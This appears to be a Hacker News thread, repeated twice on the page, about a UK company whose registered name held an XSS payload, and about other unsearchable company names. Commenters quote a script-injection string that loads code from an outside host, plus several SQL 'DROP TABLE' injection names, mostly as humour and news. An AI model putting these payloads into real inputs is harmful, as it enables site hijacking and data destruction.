That company whose name used to contain HTML script tags Ltd (opens in new tab)

(find-and-update.company-information.service.gov.uk)

436 pointsmarinintim5y ago155 comments

155 comments

jsty5y ago

Nice to see Bobby Tables is all grown up.

Relevant discussion on the Companies House Developer Forum:

https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...

ben_w5y ago

Bobby Tables would be https://find-and-update.company-information.service.gov.uk/c...

Not to be confused with the equally inspired https://find-and-update.company-information.service.gov.uk/c...

tcgv5y ago

I was wondering how much it costs to open a company in the UK to do something like that, and it seems to be really cheap (and quick):

a) Incorporate directly via Companies House

The standard registration fee to set up a company is just £12 for the ‘standard’ Companies House web incorporation service, which takes up to 24 hours to turnaround. You can pay via credit card, debit card or PayPal.

Source: https://www.itcontracting.com/how-much-limited-company-cost/

2 more replies

entrep5y ago

Not many DBMS which support stacked queries I'll guess.

dilly_bar5y ago

Hilarious!

ashleyn5y ago

This reminds me of a story I saw on Reddit once. A man worked for a payment processing firm that didn't sanitize their database inputs at all.

One day, they get a new customer called "Select". Absolutely everything stopped working.

Nextgrid5y ago

I'm disappointed that the discussion seems more about debating whether that person acted in good faith or that the law regarding acceptable characters in company names should be changed, as opposed to the bigger concern of why were they not sanitizing company names? Even without intent to insert HTML, characters such as < or > would still break their pages.

bearbin5y ago

Relevant context: https://twitter.com/zofrex/status/1319286955314614275

Apparently the name used to be

    \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

achairapart5y ago

New name is disappointing. The company should at least be renamed to:

    \&quot;&gt;&lt;SCRIPT SRC=MJT.XSS.HT&gt;&lt;/SCRIPT&gt; LTD

pjc505y ago

How about EICAR ANTIVIRUS TEST FILE? Or the DeCSS key?

outsidetheparty5y ago

hitting mjt.xss.ht returns this:

/* THIS SUBDOMAIN HAS BEEN BANNED FROM THE XSS HUNTER SERVICE.

WE DO NOT ALLOW ABUSE OF OUR SERVICE, ALL SECURITY TESTING MUST BE AUTHORIZED.

Please use our contact form if you believe this ban was a mistake: https://xsshunter.com/contact */

pushrax5y ago

It previously returned an XSS test payload https://pbs.twimg.com/media/ElAYZTcX0AEyFUY?format=jpg&name=...

1 more reply

blepblep5y ago

Will that even work without http:// or at least // in front of the domain name?

Tried it in chrome and sees it as a file name on the current domain.

tim3335y ago

Seems to have a bit. Cut and paste from the guy who set up \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

>I am in the process of contacting every website that has triggered my script which has a readily available contact for submitting security issues, or a hackerone account or similar. Alas, the sort of websites that have XSS problems rarely list IT security contacts.

wahern5y ago

I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?

See https://tools.ietf.org/html/rfc3986#appendix-B

The authority section (which contains the host domain) must begin with "//" whether there's a scheme prefix or not. Otherwise it's just part of the path (or query or fragment). IIRC, these semantics are also fixed by HTML such that any attribute like HREF or SRC is parsed as-if using the canonical regex (but after entity substitution and whitespace trimming). Browsers might have implemented this differently many years ago, but I doubt it as it would conflict with being able to use a bare path atom (e.g. foo.html).

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.

bearbin5y ago

It had HTTP originally, twitter just munged it.

jtsiskin5y ago

You would think if you go to all the trouble to register a company name, you would at least use a domain you control

habosa5y ago

There's a great club in Berlin called "://about blank"

So if you're gonna Google it, don't use the URL bar.

DaiPlusPlus5y ago

My favourite social establishment is The Progress Bar.

paledot5y ago

Nice spot, but the lines are always so long. Fortunately you always know how long you have to wait.

jjar5y ago

Fun fact: It's currently law that you can have the <> and "" characters in your name.

https://www.legislation.gov.uk/uksi/2015/17/schedule/1/made

gsnedders5y ago

What's really fun is many companies' forms don't allow for companies to have any punctuation in their name.

pbhjpbhj5y ago

I think I'd excited that as Schedule 1 of this Act doesn't exclude those characters.

For example you can use the characters w,i,n,d,s,o,r but catenated in an ordered string means you have to get special permission.

Arguably the attempt to register this was an attempt to breech the Computer Misuse Act (which would make it illegal).

surround5y ago

It’s been 13 years since the Bobby Tables comic was drawn, has nobody actually tried it yet?

max1cc5y ago

"; DROP TABLE "COMPANIES";-- LTD" https://find-and-update.company-information.service.gov.uk/c...

1 more reply

iso16315y ago

https://find-and-update.company-information.service.gov.uk/c...

hliyan5y ago

On a related topic, the name of the company I work for starts with a colon. The rest of the name is a common adjective. As you can imagine, it is virtually ungooglable at the moment. Any thoughts on how to get around this?

mkl5y ago

Just change the name. It'll be easier and more cost effective in the long run.

I've started working with some software called STACK recently, and it's almost impossible to find anything by searching (go ahead and try!). If it was a commercial product they would be sunk.

tlavoie5y ago

At least if it's Haskell's stack build tool, adding the language name to the query makes it pop right up. Not sure if this helps in your case though.

joubert5y ago

I found your company name in your profile - ":different"

Even if I google ":different" company or without the colon, top results for me is a parfumerie.

When I google different australia, you're the top result.

nullsense5y ago

Surprised New Zealand isn't the top result when you Google "different Australia"

2 more replies

business0075y ago

better find a nickname, like D's community did, using dlang lol otherwise no one could find anything on language googling

danellis5y ago

The Go community had to do the same. Go. A language created by a company that makes a well known search engine.

3 more replies

schwartzworld5y ago

how hard would it be to learn BASIC using Google? "Basic Programming" is going to have a lot of irrelevant results.

4 more replies

Wowfunhappy5y ago

It really is amazing how big a difference this makes.

I've started using Apple's Aperture software recently (I'm well aware it's been discontinued). I really like it, but my biggest frustration is that it's difficult to learn how to do new things, because "aperture" is a generic word in photography. I can't search for the name and get results about the software.

LeifCarrotson5y ago

One of my favorite mobile games is Antiyoy, by Yiotro (https://github.com/yiotro/Antiyoy) who also created other games like Vodobanka, Achikaps, and Bleentoro.

The creator mentioned that he picked the names because they were pronounceable, unique, memorable, and searchable. That misses out on meaningfulness and familiarity, but those are expensive - by dropping those requirements, you gain easy SEO, trademarks, domains, etc. A big company knowing they're going to sell millions of copies can spend 5 figures on a domain and 6 figures on SEO, but I don't think it's worth it for most startups.

2 more replies

dqv5y ago

>I'm well aware it's been discontinued

Limiting the dates to indexes before 2016 might help (at least with google). You can usually train google to get you what you want after a few searches. This was initially a problem with the Elixir programming language, but it learned what I actually wanted it started letting me just type in the term elixir without specifying it was a programming language. On other computers not associated with that account, it does revert back to the not-so-useful results.

e.g.

    apple "aperture" color correction before:2016

1 more reply

RandallBrown5y ago

The band Chvrches chose to use the the Roman "u" to spell their name so they'd be easier to search.

1 more reply

bigiain5y ago

See also "Pages", "Numbers", "Keynote"...

Apple don't give a fuck.

1 more reply

saalweachter5y ago

Back when I worked at a comparison shopping engine, I had a bit of a laugh when I saw that the indexing pipeline was generating error messages because the "clean" function returned empty for some products in the feed from Amazon, because they had names like "++++++".

It was usually musical albums that liked to have names that made it impossible for fans to find the music.

KineticLensman5y ago

> Musical albums that liked to have names

The band 'Audiobooks' has taken this to the next level

2 more replies

kps5y ago

In another era, “+++ATH” would have been a good name.

Scoundreller5y ago

Don’t go with !!!

You’ll never find them on YouTube or google unless you search for their informal name: chk chk chk

yaboy5y ago

However, they benefitted greatly in the early ‘00s. If you had them in your Apple Music library, iTunes always put them at the top of your alphabetical music library, keeping them top of mind, ! comes before A. There might have a similar iTunes Store benefit too.

Terrible Google SEO, great accidental Apple SEO.

2 more replies

LeoPanthera5y ago

Google have a hardcoded exception for the band "the the".

1 more reply

surround5y ago

There’s a video on YouTube with three full-width explanation points as the title. I watched it once, and although it wasn’t particularly interesting, it bugs me that I cannot find it again.

jkingsbery5y ago

Convince the powers-that-be in your company to invest in contracting with a marketing/SEO person or team to help come up with a new name. You want someone with marketing chops so that it's a good name, but you also want someone who knows about SEO so you don't end up on the second page for your own name search.

Zelphyr5y ago

Is it "Colon Blow"?

willturman5y ago

This just made me laugh so hard. Phil Hartman was great. Here's the reference: https://www.youtube.com/watch?v=Ku42Iszh9KM

achairapart5y ago

Launch a multi-million dollar brand advertising campaign.

mtmail5y ago

And I thought Yahoo! (with exclamation mark) had it rough.

LeifCarrotson5y ago

At least they're a little better than a hypothetical -"Yahoo" which would return no results for your company at all...

1 more reply

skocznymroczny5y ago

:oscopy ?

kps5y ago

:wq!

razster5y ago

I registered <b>Be</b> for a small company a long time ago. I thought it was clever. They folded during the tech bubble.

dylan6045y ago

clearly, it was older as now it would be encouraged to use <strong>Be</strong>

r-w5y ago

<b>Be</b>, <strong>be</strong>, but don’t <head>be</head>. That's an illegal act of violence.

1 more reply

Freak_NL5y ago

That's actually kind of clever, albeit developer centric.

lazyasciiart5y ago

Also, too many vowels for a modern company name.

bigiain5y ago

daveslash5y ago

<blink>Blink</blink> -- It's a deprecated tag now, and most browsers don't support it, but I would have loved to have seen that as a company... <marquee> is still supported though....

79525y ago

Bold bee?

znpy5y ago

Be bold ?

2 more replies

ryukafalz5y ago

I giggled at the previous company name being redacted as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” too. Not sure if that’s a common thing to do or if they made an exception for these shenanigans so they didn’t have to display the XSS.

addaon5y ago

Now someone just has to register "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]" as a company name...

dawnerd5y ago

Kinda tempted to see if Oregon would let me register [REDACTED], LLC

Only 100 dollars...

Edit: Someone beat me to it. Reg #1330411-94

1 more reply

_4gzn5y ago

Here is to the company

  Dariusz Jakubowski x'; DROP TABLE users; SELECT '1

that ran in Poland from 2014 to 2019 [0].

[0] https://prod.ceidg.gov.pl/CEIDG/ceidg.public.ui/SearchDetail... (check the reCAPTCHA and click "Dalej")

pbhjpbhj5y ago

For a minute I thought their name was (without the quotes) "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]".

Seems like a regulation to add "computer code like expressions" to the list that requires prior approval of the Secretary of State might be useful.

r-w5y ago

That might require a bit more effort on the part of a company I know, who would have to register their logo "moz://a".

pbhjpbhj5y ago

That would be a trade mark rather than a company name in this instance I think. In UK registered trademarks are standard type-written letters for word marks. If they contain symbols then they're figurative marks and it's an image of the mark which is registered.

On that point though, searching on the UK trademark registry it looks like it just strips non-alphanumeric symbols. A search for "Moz://a” returns "moza".

yobert5y ago

And the officer's last name is Tandy. Good computer name :D

proactivesvcs5y ago

I'm slightly surprised that AAISP's RevK isn't behind this one. I'd document his shenanigans but they'd eventually break out of the data set.

MonadIsPronad5y ago

Now _that_ is pretty funny. I wonder what the company name is. Even the PDF of the incorporation certificate doesn't show the name.

cwmma5y ago

\"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

klodolph5y ago

; DROP TABLE "COMPANIES";-- LTD

(Yes, the description is inaccurate.)

Edit: This is a different company, actually.

fennecfoxen5y ago

; DROP TABLE "COMPANIES";-- LTD is still live at https://find-and-update.company-information.service.gov.uk/c...

See also "BETTS &AMP; TWINE LTD" https://find-and-update.company-information.service.gov.uk/c...

SAFDASD & SFSAF \' SFDAASF\" LTD https://find-and-update.company-information.service.gov.uk/c...

MonadIsPronad5y ago

Outstanding. What a clever, cheeky fellow. Obligatory XKCD: https://xkcd.com/327/

gpvos5y ago

Just never change the name to "null".

mathieuh5y ago

Is Companies House's website not done by GDS or something? I worked on a few GDS projects for DFT, we had to have independent pen testers test our services before they moved between phases.

Someone12345y ago

Companies House wasn't compromised, they warned third parties about potential issues with the underlying data.

mkishi5y ago

According to a thread [1] on Companies House's Developer Forum, they were.

[1]: https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...

mathieuh5y ago

No I mean the fact that this was possible on their website, XSS is one of the simplest things to test, in fact it was one of the standard tests UI testers would do on new screens.

Not saying they were compromised.

1 more reply

tshanmu5y ago

Would be it interesting to know why the name had to be changed?

klodolph5y ago

Because there are a bunch of companies which do aggregation of information about companies, and not all of them used parameterized SQL queries :-/

fennecfoxen5y ago

This is HTML injection, not SQL.

1 more reply

ironmagma5y ago

Not even all SQL engines support quoting all types of values. BigQuery, looking at you.

NullPrefix5y ago

And who's problem is that?

1 more reply

mocatta5y ago

Relatedly, several years ago I scraped all companies on the old companies house webcheck site. There were two that interrupted my scraper: both contained '<' in the company name, and both seemed to take the webcheck service offline for a few seconds whenever I requested their pages. I can't say for sure - it might have been a temporary IP block I suppose - but it amused me nonetheless.

kalium-xyz5y ago

This is not a prank, its the new Companies house search which still contains some kinks and I assume they had to work around a very specific one here.

ceejayoz5y ago

My understanding is that the Companies House search is fine, but various third-party consumers of the list might not be.

tim3335y ago

Here's an internet archive of the old name on one of those https://web.archive.org/web/20201022184617/https://suite.end...

wodenokoto5y ago

What was the name? It’s former name is listed as “[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]” and it’s current name doesn’t contain any HTML tags (it’s literally the same as the headline)

Those are both funny and confusing names, but they don’t warrant comparison to sql-injections, so I am guessing there’s another name with actual HTML tags.

agys5y ago

There was also this project of Mediengruppe Bitnik (check the video with some online bookstores):

http://p-dpa.net/work/script-alert-mediengruppe-bitnik/

daniaal5y ago

This company is class. https://find-and-update.company-information.service.gov.uk/c...

ineedasername5y ago

Like little Bobby Drop Tables: https://xkcd.com/327/

tomcat275y ago

hahahahaahaha! is this some prank?

1 more reply

j / k navigate · click thread line to collapse

155 comments

jsty5y ago

Nice to see Bobby Tables is all grown up.

Relevant discussion on the Companies House Developer Forum:

https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...

ben_w5y ago

Bobby Tables would be https://find-and-update.company-information.service.gov.uk/c...

Not to be confused with the equally inspired https://find-and-update.company-information.service.gov.uk/c...

tcgv5y ago

I was wondering how much it costs to open a company in the UK to do something like that, and it seems to be really cheap (and quick):

a) Incorporate directly via Companies House

Source: https://www.itcontracting.com/how-much-limited-company-cost/

2 more replies

entrep5y ago

Not many DBMS which support stacked queries I'll guess.

dilly_bar5y ago

Hilarious!

ashleyn5y ago

This reminds me of a story I saw on Reddit once. A man worked for a payment processing firm that didn't sanitize their database inputs at all.

One day, they get a new customer called "Select". Absolutely everything stopped working.

Nextgrid5y ago

bearbin5y ago

Relevant context: https://twitter.com/zofrex/status/1319286955314614275

Apparently the name used to be

    \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

achairapart5y ago

New name is disappointing. The company should at least be renamed to:

    \&quot;&gt;&lt;SCRIPT SRC=MJT.XSS.HT&gt;&lt;/SCRIPT&gt; LTD

pjc505y ago

How about EICAR ANTIVIRUS TEST FILE? Or the DeCSS key?

outsidetheparty5y ago

hitting mjt.xss.ht returns this:

/* THIS SUBDOMAIN HAS BEEN BANNED FROM THE XSS HUNTER SERVICE.

WE DO NOT ALLOW ABUSE OF OUR SERVICE, ALL SECURITY TESTING MUST BE AUTHORIZED.

Please use our contact form if you believe this ban was a mistake: https://xsshunter.com/contact */

pushrax5y ago

It previously returned an XSS test payload https://pbs.twimg.com/media/ElAYZTcX0AEyFUY?format=jpg&name=...

1 more reply

blepblep5y ago

Will that even work without http:// or at least // in front of the domain name?

Tried it in chrome and sees it as a file name on the current domain.

tim3335y ago

Seems to have a bit. Cut and paste from the guy who set up \"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

...

wahern5y ago

I don't think so. The traditional, canonical regular expression[1] for parsing a URL is

  ^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?

See https://tools.ietf.org/html/rfc3986#appendix-B

[1] I normally eschew using regular expressions for proper parsing, but for URLs the canonical expression is both adequate and advisable for correctness.

bearbin5y ago

It had HTTP originally, twitter just munged it.

jtsiskin5y ago

You would think if you go to all the trouble to register a company name, you would at least use a domain you control

habosa5y ago

There's a great club in Berlin called "://about blank"

So if you're gonna Google it, don't use the URL bar.

DaiPlusPlus5y ago

My favourite social establishment is The Progress Bar.

paledot5y ago

Nice spot, but the lines are always so long. Fortunately you always know how long you have to wait.

jjar5y ago

Fun fact: It's currently law that you can have the <> and "" characters in your name.

https://www.legislation.gov.uk/uksi/2015/17/schedule/1/made

gsnedders5y ago

What's really fun is many companies' forms don't allow for companies to have any punctuation in their name.

pbhjpbhj5y ago

I think I'd excited that as Schedule 1 of this Act doesn't exclude those characters.

For example you can use the characters w,i,n,d,s,o,r but catenated in an ordered string means you have to get special permission.

Arguably the attempt to register this was an attempt to breech the Computer Misuse Act (which would make it illegal).

surround5y ago

It’s been 13 years since the Bobby Tables comic was drawn, has nobody actually tried it yet?

max1cc5y ago

"; DROP TABLE "COMPANIES";-- LTD" https://find-and-update.company-information.service.gov.uk/c...

1 more reply

iso16315y ago

https://find-and-update.company-information.service.gov.uk/c...

hliyan5y ago

mkl5y ago

Just change the name. It'll be easier and more cost effective in the long run.

I've started working with some software called STACK recently, and it's almost impossible to find anything by searching (go ahead and try!). If it was a commercial product they would be sunk.

tlavoie5y ago

At least if it's Haskell's stack build tool, adding the language name to the query makes it pop right up. Not sure if this helps in your case though.

joubert5y ago

I found your company name in your profile - ":different"

Even if I google ":different" company or without the colon, top results for me is a parfumerie.

When I google different australia, you're the top result.

nullsense5y ago

Surprised New Zealand isn't the top result when you Google "different Australia"

2 more replies

business0075y ago

better find a nickname, like D's community did, using dlang lol otherwise no one could find anything on language googling

danellis5y ago

The Go community had to do the same. Go. A language created by a company that makes a well known search engine.

3 more replies

schwartzworld5y ago

how hard would it be to learn BASIC using Google? "Basic Programming" is going to have a lot of irrelevant results.

4 more replies

Wowfunhappy5y ago

It really is amazing how big a difference this makes.

LeifCarrotson5y ago

One of my favorite mobile games is Antiyoy, by Yiotro (https://github.com/yiotro/Antiyoy) who also created other games like Vodobanka, Achikaps, and Bleentoro.

2 more replies

dqv5y ago

>I'm well aware it's been discontinued

e.g.

    apple "aperture" color correction before:2016

1 more reply

RandallBrown5y ago

The band Chvrches chose to use the the Roman "u" to spell their name so they'd be easier to search.

1 more reply

bigiain5y ago

See also "Pages", "Numbers", "Keynote"...

Apple don't give a fuck.

1 more reply

saalweachter5y ago

It was usually musical albums that liked to have names that made it impossible for fans to find the music.

KineticLensman5y ago

> Musical albums that liked to have names

The band 'Audiobooks' has taken this to the next level

2 more replies

kps5y ago

In another era, “+++ATH” would have been a good name.

Scoundreller5y ago

Don’t go with !!!

You’ll never find them on YouTube or google unless you search for their informal name: chk chk chk

yaboy5y ago

Terrible Google SEO, great accidental Apple SEO.

2 more replies

LeoPanthera5y ago

Google have a hardcoded exception for the band "the the".

1 more reply

surround5y ago

There’s a video on YouTube with three full-width explanation points as the title. I watched it once, and although it wasn’t particularly interesting, it bugs me that I cannot find it again.

jkingsbery5y ago

Zelphyr5y ago

Is it "Colon Blow"?

willturman5y ago

This just made me laugh so hard. Phil Hartman was great. Here's the reference: https://www.youtube.com/watch?v=Ku42Iszh9KM

achairapart5y ago

Launch a multi-million dollar brand advertising campaign.

mtmail5y ago

And I thought Yahoo! (with exclamation mark) had it rough.

LeifCarrotson5y ago

At least they're a little better than a hypothetical -"Yahoo" which would return no results for your company at all...

1 more reply

skocznymroczny5y ago

:oscopy ?

kps5y ago

:wq!

razster5y ago

I registered <b>Be</b> for a small company a long time ago. I thought it was clever. They folded during the tech bubble.

dylan6045y ago

clearly, it was older as now it would be encouraged to use <strong>Be</strong>

r-w5y ago

<b>Be</b>, <strong>be</strong>, but don’t <head>be</head>. That's an illegal act of violence.

1 more reply

Freak_NL5y ago

That's actually kind of clever, albeit developer centric.

lazyasciiart5y ago

Also, too many vowels for a modern company name.

bigiain5y ago

daveslash5y ago

<blink>Blink</blink> -- It's a deprecated tag now, and most browsers don't support it, but I would have loved to have seen that as a company... <marquee> is still supported though....

79525y ago

Bold bee?

znpy5y ago

Be bold ?

2 more replies

ryukafalz5y ago

addaon5y ago

Now someone just has to register "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]" as a company name...

dawnerd5y ago

Kinda tempted to see if Oregon would let me register [REDACTED], LLC

Only 100 dollars...

Edit: Someone beat me to it. Reg #1330411-94

1 more reply

_4gzn5y ago

Here is to the company

  Dariusz Jakubowski x'; DROP TABLE users; SELECT '1

that ran in Poland from 2014 to 2019 [0].

[0] https://prod.ceidg.gov.pl/CEIDG/ceidg.public.ui/SearchDetail... (check the reCAPTCHA and click "Dalej")

pbhjpbhj5y ago

For a minute I thought their name was (without the quotes) "[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]".

Seems like a regulation to add "computer code like expressions" to the list that requires prior approval of the Secretary of State might be useful.

r-w5y ago

That might require a bit more effort on the part of a company I know, who would have to register their logo "moz://a".

pbhjpbhj5y ago

On that point though, searching on the UK trademark registry it looks like it just strips non-alphanumeric symbols. A search for "Moz://a” returns "moza".

yobert5y ago

And the officer's last name is Tandy. Good computer name :D

proactivesvcs5y ago

I'm slightly surprised that AAISP's RevK isn't behind this one. I'd document his shenanigans but they'd eventually break out of the data set.

MonadIsPronad5y ago

Now _that_ is pretty funny. I wonder what the company name is. Even the PDF of the incorporation certificate doesn't show the name.

cwmma5y ago

\"><SCRIPT SRC=MJT.XSS.HT></SCRIPT> LTD

klodolph5y ago

; DROP TABLE "COMPANIES";-- LTD

(Yes, the description is inaccurate.)

Edit: This is a different company, actually.

fennecfoxen5y ago

; DROP TABLE "COMPANIES";-- LTD is still live at https://find-and-update.company-information.service.gov.uk/c...

See also "BETTS &AMP; TWINE LTD" https://find-and-update.company-information.service.gov.uk/c...

SAFDASD & SFSAF \' SFDAASF\" LTD https://find-and-update.company-information.service.gov.uk/c...

MonadIsPronad5y ago

Outstanding. What a clever, cheeky fellow. Obligatory XKCD: https://xkcd.com/327/

gpvos5y ago

Just never change the name to "null".

mathieuh5y ago

Is Companies House's website not done by GDS or something? I worked on a few GDS projects for DFT, we had to have independent pen testers test our services before they moved between phases.

Someone12345y ago

Companies House wasn't compromised, they warned third parties about potential issues with the underlying data.

mkishi5y ago

According to a thread [1] on Companies House's Developer Forum, they were.

[1]: https://forum.aws.chdev.org/t/cross-site-scripting-xss-softw...

mathieuh5y ago

No I mean the fact that this was possible on their website, XSS is one of the simplest things to test, in fact it was one of the standard tests UI testers would do on new screens.

Not saying they were compromised.

1 more reply

tshanmu5y ago

Would be it interesting to know why the name had to be changed?

klodolph5y ago

Because there are a bunch of companies which do aggregation of information about companies, and not all of them used parameterized SQL queries :-/

fennecfoxen5y ago

This is HTML injection, not SQL.

1 more reply

ironmagma5y ago

Not even all SQL engines support quoting all types of values. BigQuery, looking at you.

NullPrefix5y ago

And who's problem is that?

1 more reply

mocatta5y ago

kalium-xyz5y ago

This is not a prank, its the new Companies house search which still contains some kinks and I assume they had to work around a very specific one here.

ceejayoz5y ago

My understanding is that the Companies House search is fine, but various third-party consumers of the list might not be.

tim3335y ago

Here's an internet archive of the old name on one of those https://web.archive.org/web/20201022184617/https://suite.end...

wodenokoto5y ago

Those are both funny and confusing names, but they don’t warrant comparison to sql-injections, so I am guessing there’s another name with actual HTML tags.

agys5y ago

There was also this project of Mediengruppe Bitnik (check the video with some online bookstores):

http://p-dpa.net/work/script-alert-mediengruppe-bitnik/

daniaal5y ago

This company is class. https://find-and-update.company-information.service.gov.uk/c...

ineedasername5y ago

Like little Bobby Drop Tables: https://xkcd.com/327/

tomcat275y ago

hahahahaahaha! is this some prank?

1 more reply

j / k navigate · click thread line to collapse